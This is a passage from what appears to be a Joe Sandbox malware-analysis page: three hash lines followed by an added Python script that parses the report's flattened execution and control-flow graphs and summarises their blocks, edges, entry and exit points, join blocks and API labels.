                                                                                                                                • Instruction ID: 579ab4b4173843523233fcc57657de909310c364d29d22fa917980a247ea1f86
                                                                                                                                • Opcode Fuzzy Hash: 7dfceb0aaa7ef205550cdb39d4c8ac1adad94abc02ae62dd78af804b44b4eaee
                                                                                                                                • Instruction Fuzzy Hash: 22D107B291DA8A4FEB76AF7888155B5BFE0EF56311B1800FEE44DC70D3DA199806C391
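The execution_graph and control_flow_graph entries above are rendered graphs flattened to a single line of tokens: a decimal token opens a node, the hex token that follows it is the block's address or address range, any other token (here LoadLibraryExW) is a label attached to that node, and a src->dst token is an edge. The Python below is an added example, not Joe Sandbox tooling or part of this report: it rebuilds the two graphs on this page (the two strings are copied verbatim from the entries above) and answers what an analyst asks first of a JIT-compiled region like this one: where the routine enters, which blocks leave it, which blocks many paths converge on, and which nodes carry an API call. Its node count for the execution graph agrees with the report's "Total number of Nodes: 3".

```python
# Added example: parser for Joe Sandbox's flattened graph lines plus a few
# structural queries. Graph strings below are copied from this report.
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Tuple

# Execution Graph entry of this report (PID index 00000023, region 00007FFB4E7F0000).
EXECUTION_GRAPH = (
    "execution_graph 5605 7ffb4e7fd754 5606 7ffb4e7fd75d LoadLibraryExW "
    "5605->5606 5608 7ffb4e7fd80d 5606->5608"
)

# Control-flow Graph entry of this report (same process, region 00007FFB4E8C0000).
CONTROL_FLOW_GRAPH = (
    "control_flow_graph 9 7ffb4e8c2fca-7ffb4e8c2fcf 10 7ffb4e8c3011-7ffb4e8c3028 9->10 "
    "11 7ffb4e8c2fd1-7ffb4e8c2feb 9->11 14 7ffb4e8c302a-7ffb4e8c3054 10->14 "
    "15 7ffb4e8c305d-7ffb4e8c3064 10->15 12 7ffb4e8c2fed-7ffb4e8c300f 11->12 13 7ffb4e8c2fbf 11->13 "
    "12->10 13->9 23 7ffb4e8c305a-7ffb4e8c305b 14->23 24 7ffb4e8c32bc-7ffb4e8c337b 14->24 "
    "18 7ffb4e8c3066-7ffb4e8c3073 15->18 19 7ffb4e8c307d-7ffb4e8c3082 15->19 18->19 "
    "28 7ffb4e8c3075-7ffb4e8c307b 18->28 20 7ffb4e8c3088-7ffb4e8c308b 19->20 "
    "21 7ffb4e8c3260-7ffb4e8c326a 19->21 26 7ffb4e8c308d-7ffb4e8c30a0 20->26 27 7ffb4e8c30a2 20->27 "
    "29 7ffb4e8c3279-7ffb4e8c32b9 21->29 30 7ffb4e8c326c-7ffb4e8c3278 21->30 23->15 "
    "32 7ffb4e8c30a4-7ffb4e8c30a6 26->32 27->32 28->19 29->24 32->21 "
    "35 7ffb4e8c30ac-7ffb4e8c30e0 32->35 47 7ffb4e8c30f7 35->47 48 7ffb4e8c30e2-7ffb4e8c30f5 35->48 "
    "52 7ffb4e8c30f9-7ffb4e8c30fb 47->52 48->52 52->21 53 7ffb4e8c3101-7ffb4e8c3109 52->53 53->24 "
    "54 7ffb4e8c310f-7ffb4e8c3119 53->54 56 7ffb4e8c3135-7ffb4e8c3145 54->56 "
    "57 7ffb4e8c311b-7ffb4e8c3133 54->57 56->21 62 7ffb4e8c314b-7ffb4e8c317c 56->62 57->56 62->21 "
    "68 7ffb4e8c3182-7ffb4e8c31ae 62->68 73 7ffb4e8c31d9 68->73 74 7ffb4e8c31b0-7ffb4e8c31d7 68->74 "
    "75 7ffb4e8c31db-7ffb4e8c31dd 73->75 74->75 75->21 77 7ffb4e8c31e3-7ffb4e8c31eb 75->77 "
    "78 7ffb4e8c31ed-7ffb4e8c31f7 77->78 79 7ffb4e8c31fb 77->79 80 7ffb4e8c31f9 78->80 "
    "81 7ffb4e8c3217-7ffb4e8c3239 78->81 83 7ffb4e8c3200-7ffb4e8c3215 79->83 80->83 "
    "87 7ffb4e8c3240-7ffb4e8c3246 81->87 83->81 88 7ffb4e8c324d-7ffb4e8c325f 87->88"
)

ADDR_RE = re.compile(r"^[0-9a-f]{8,}(?:-[0-9a-f]{8,})?$")  # "start" or "start-end", hex
NODE_RE = re.compile(r"^\d{1,7}$")  # node ids are short decimals; 8+ digits would be an address


@dataclass
class Block:
    nid: int
    start: Optional[int] = None
    end: Optional[int] = None
    labels: List[str] = field(default_factory=list)  # API names, e.g. LoadLibraryExW


def parse_graph(text: str) -> Tuple[Dict[int, Block], List[Tuple[int, int]]]:
    """Tokenise one flattened graph line into {node id: Block} and (src, dst) edges."""
    tokens = text.split()
    if tokens and tokens[0] in ("execution_graph", "control_flow_graph"):
        tokens = tokens[1:]
    blocks: Dict[int, Block] = {}
    edges: List[Tuple[int, int]] = []
    current: Optional[Block] = None
    for tok in tokens:
        if "->" in tok:  # edge token
            src, dst = tok.split("->", 1)
            edges.append((int(src), int(dst)))
        elif NODE_RE.match(tok):  # new node; later tokens attach to it
            current = blocks.setdefault(int(tok), Block(int(tok)))
        elif current is None:
            raise ValueError(f"token {tok!r} appears before any node id")
        elif ADDR_RE.match(tok):  # address or address range of the current node
            lo, _, hi = tok.partition("-")
            current.start = int(lo, 16)
            current.end = int(hi, 16) if hi else current.start
        else:  # anything else is a label on the current node
            current.labels.append(tok)
    return blocks, edges


def in_degrees(blocks: Dict[int, Block], edges: List[Tuple[int, int]]) -> Dict[int, int]:
    deg = {n: 0 for n in blocks}
    for _, dst in edges:
        deg[dst] = deg.get(dst, 0) + 1  # tolerate edges to ids never declared
    return deg


def sinks(blocks: Dict[int, Block], edges: List[Tuple[int, int]]) -> List[int]:
    """Blocks with no successor: the routine leaves through these."""
    has_out = {src for src, _ in edges}
    return sorted(n for n in blocks if n not in has_out)


def entry_block(blocks: Dict[int, Block], edges: List[Tuple[int, int]]) -> int:
    """A block with no predecessor if one exists; otherwise the lowest address.
    The fallback matters: the CFG on this page loops 13 -> 9 -> 11 -> 13, so no
    block has in-degree 0 and the entry is the lowest-addressed block (13)."""
    deg = in_degrees(blocks, edges)
    roots = [n for n in blocks if deg.get(n, 0) == 0]
    candidates = roots or list(blocks)
    return min(candidates, key=lambda n: blocks[n].start if blocks[n].start is not None else 1 << 64)


def api_calls(blocks: Dict[int, Block]) -> Dict[int, List[str]]:
    return {b.nid: list(b.labels) for b in blocks.values() if b.labels}


def summarize(text: str) -> dict:
    blocks, edges = parse_graph(text)
    deg = in_degrees(blocks, edges)
    return {
        "nodes": len(blocks),
        "edges": len(edges),
        "entry": entry_block(blocks, edges),
        "sinks": sinks(blocks, edges),
        "join_blocks": sorted(n for n, d in deg.items() if d >= 3),  # many paths converge here
        "api_calls": api_calls(blocks),
    }


if __name__ == "__main__":
    for name, graph in (("execution_graph", EXECUTION_GRAPH), ("control_flow_graph", CONTROL_FLOW_GRAPH)):
        print(name, summarize(graph))
```

For the control-flow graph this reports 40 blocks and 57 edges, entry at block 13, exits at 24, 30 and 88, and block 21 (7ffb4e8c3260-7ffb4e8c326a) as the join point reached from six different blocks; that convergence is the place to read in the disassembly before drawing conclusions about the routine, since the graph alone does not say what the shared path does.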